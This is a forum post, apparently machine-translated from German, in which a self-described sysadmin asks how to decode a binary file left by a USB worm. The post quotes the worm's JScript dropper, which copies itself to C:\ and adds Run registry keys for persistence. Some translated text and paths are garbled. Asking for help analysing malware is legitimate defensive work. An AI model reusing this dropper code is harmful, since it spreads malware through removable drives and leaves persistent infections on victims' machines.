Wie verschlüsselt man die JavaScript -Virusdatei? (nicht Reißverschluss)JavaScript

Javascript-Forum
Guest
 Wie verschlüsselt man die JavaScript -Virusdatei? (nicht Reißverschluss)

Post by Guest »

Wie öffne ich den verschlüsselten Quellcode eines Virus? Ich habe im College einen Virus gefangen. Es erstellte eine "Dokumente" -Verknüpfung auf einem Flash -Laufwerk, und als ich es öffnete, öffnete es einen Browser mit dem folgenden Text:

Code: Select all

var FSO = WScript.CreateObject("Scripting.FIleSystemObject"); var WshShell = WScript.CreateObject("Wscript.Shell");  var pt1 = FSO.GetDriveName(WshShell.CurrentDirectory); //flash drive name //open the window with documents and copy the virus to c:\. WshShell.Run(pt1+"\Document"); FSO.CopyFolder(pt1+"\Document\SystemPC", "C:\"); //write to the registry WshShell.RegWrite("HKEY_CURRENT_USER\Software\Microsoft\\Windows\CurrentVersion\\\Run\prog", "C:\\SystemPC\prog.js", "REG_SZ"); WshShell.RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\onFlash", "C:\SystemPC\onFlash.js", "REG_SZ"); //run programs WshShell.Run("C:C:\\SystemPC\\onFlash.js"); WshShell.Run("C:\\SystemPC\prog.js"). 

Aber dem PC ist nichts passiert, lol. Ich habe gerade Attraktivität -H -r -s /s /d g eingetragen:* In CMD und im Ordner Dokumente wurde mit meinen Dateien und dem SystemPC -Ordner angezeigt. In SystemPC gibt es Virusdateien onflash.js, onpc.js, prog.js, unp40590149.tmp, virus.js. Und es ist die letzte Datei, die nicht lesbar ist. (Es ist ein binär) < /p>
Verschiedene Kodierungen in Notepad ++ haben nicht geholfen. ist das, was HXD auf Foto zeigt: (https://i.static.net/kzprbevb.jpg) Ich bin daran interessiert, den Quellcode zu sehen Da ich dort der Systemadministrator bin und für die Computer verantwortlich bin: (< /p>
Ich habe versucht, es mit Notepad ++ und verschiedenen Codierungen darin zu öffnen; ich habe es mit HXD geöffnet. Sie können es nicht öffnen. Sie können es nicht öffnen mit 7zip

Quick Reply

Change Text Case: 

• Similar Topics
    Replies
    Views
    Last post